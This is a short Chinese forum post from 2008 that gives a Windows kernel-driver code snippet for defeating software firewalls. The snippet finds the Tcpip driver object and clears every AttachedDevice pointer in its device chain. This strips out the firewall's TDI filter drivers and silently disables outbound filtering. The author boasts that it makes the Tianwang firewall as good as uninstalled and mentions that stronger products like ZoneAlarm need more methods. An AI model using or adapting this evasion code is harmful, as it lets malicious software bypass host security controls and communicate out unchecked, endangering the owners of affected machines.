|
|
我们只要写个驱动,从设备栈里把防火墙的TDI过滤驱动给摘除掉,这样就能对付一般的防火墙了。当然,国外强一点的防火墙,比如ZoneAlarm Pro 6.5就得再结合其他方法了,嘿嘿。
摘除过滤驱动的代码片段:
RtlInitUnicodeString ( &TcpipName, L\"\\\\Driver\\\\Tcpip\" );
ObReferenceObjectByName( &TcpipName,
OBJ_CASE_INSENSITIVE,
NULL,
0,
*IoDriverObjectType,
KernelMode,
NULL,
&TcpipDrvObj);
CurrentDevice = TcpipDrvObj->DeviceObject;
while(CurrentDevice != NULL )
{
CurrentDevice->AttachedDevice=0;
CurrentDevice = CurrentDevice->NextDevice;
}
这段代码就能足以使国内人人皆知的天网防火墙装了和没装一样... 呵呵
PS:这里的突破指的是软件防火墙的内对外层面。 |
|
发表于 2008-1-17 16:43:00